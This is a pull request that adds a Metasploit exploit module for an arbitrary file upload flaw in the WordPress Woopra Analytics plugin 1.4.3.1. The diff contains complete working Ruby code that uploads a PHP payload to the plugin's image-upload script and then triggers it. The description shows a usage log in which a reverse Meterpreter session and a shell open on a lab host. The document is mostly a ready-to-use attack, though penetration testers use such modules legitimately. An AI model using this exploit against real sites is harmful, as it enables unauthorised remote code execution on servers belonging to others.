### PR TITLE
Add WordPress Woopra Analytics File Upload

### DIFF
--- a/modules/exploits/unix/webapp/wp_woopra_analytics_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_woopra_analytics_file_upload.rb
@@ -1,0 +1,79 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'           => 'Wordpress Woopra Analytics File Upload',
+      'Description'    => %q{
+          The Wordpress Woopra Analytics plugin contains an file upload vulnerability.
+          We can upload arbitrary files to the upload folder, because the plugin also uses
+          it's own file upload mechanism instead of the wordpress api it's possible to
+          upload any file type.
+      },
+      'Author'         =>
+        [
+          'wantexz', # Vulnerability Discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['WPVDB', '6903'],
+          ['URL', 'http://packetstormsecurity.com/files/123525/']
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['WP Woopra Analytics 1.4.3.1', {}]],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Sep 06 2013'
+    ))
+  end
+
+  def check
+    check_plugin_version_from_readme('woopra', '1.4.3.2')
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to upload payload")
+    filename = "#{rand_text_alpha_lower(6)}.php"
+
+    print_status("#{peer} - Uploading payload")
+    res = send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => normalize_uri(wordpress_url_plugins, 'woopra', 'inc', 'php-ofc-library', 'ofc_upload_image.php'),
+      'ctype'    => 'text/plain',
+      'vars_get' => {
+        'name'   => "#{filename}"
+      },
+      'data' => payload.encoded
+    )
+
+    if res
+      if res.code == 200
+        register_files_for_cleanup(filename)
+      else
+        fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
+      end
+    else
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+    end
+
+    print_status("#{peer} - Calling uploaded file #{filename}")
+    send_request_cgi(
+      { 'uri'    => normalize_uri(wordpress_url_plugins, 'woopra', 'inc', 'tmp-upload-images', filename) },
+      5
+    )
+  end
+end


### PR DESCRIPTION
#### Add Wordpress Woopra Analytics File Upload Vulnerability.

  Application: Wordpress Plugin 'Woopra Analytics' 1.4.3.1
  Homepage: https://wordpress.org/plugins/woopra
  Source Code: https://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip
  Active Installs: 8,000+
  References: https://wpvulndb.com/vulnerabilities/6903
#### Vulnerable packages*

  1.4.3.1
#### Usage:
##### Linux (Ubuntu 12.04.5 LTS):

```
msf > use exploit/unix/webapp/wp_woopra_analytics_file_upload 
msf exploit(wp_woopra_analytics_file_upload) > show options 

Module options (exploit/unix/webapp/wp_woopra_analytics_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   WP Woopra Analytics 1.4.3.1


msf exploit(wp_woopra_analytics_file_upload) > info

       Name: Wordpress Woopra Analytics File Upload
     Module: exploit/unix/webapp/wp_woopra_analytics_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-04-06

Provided by:
  wantexz
  Roberto Soares Espreto <robertoespreto@gmail.com>

Available targets:
  Id  Name
  --  ----
  0   WP Woopra Analytics 1.4.3.1

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  The Wordpress Woopra Analytics plugin contains an file upload 
  vulnerability. We can upload arbitrary files to the upload folder, 
  because the plugin also uses it's own file upload mechanism instead 
  of the wordpress api it's possible to upload any file type.

References:
  https://wpvulndb.com/vulnerabilities/6903
  http://packetstormsecurity.com/files/123525/

msf exploit(wp_woopra_analytics_file_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_woopra_analytics_file_upload) > check
[*] 192.168.1.31:80 - The target appears to be vulnerable.
msf exploit(wp_woopra_analytics_file_upload) > exploit 

[*] Started reverse handler on 192.168.1.37:4444 
[*] 192.168.1.31:80 - Trying to upload payload
[*] 192.168.1.31:80 - Uploading payload
[*] 192.168.1.31:80 - Calling uploaded file hmbyyz.php
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.31:47928) at 2015-04-27 00:15:32 -0300
[+] Deleted hmbyyz.php

meterpreter > sysinfo 
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 3706 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```
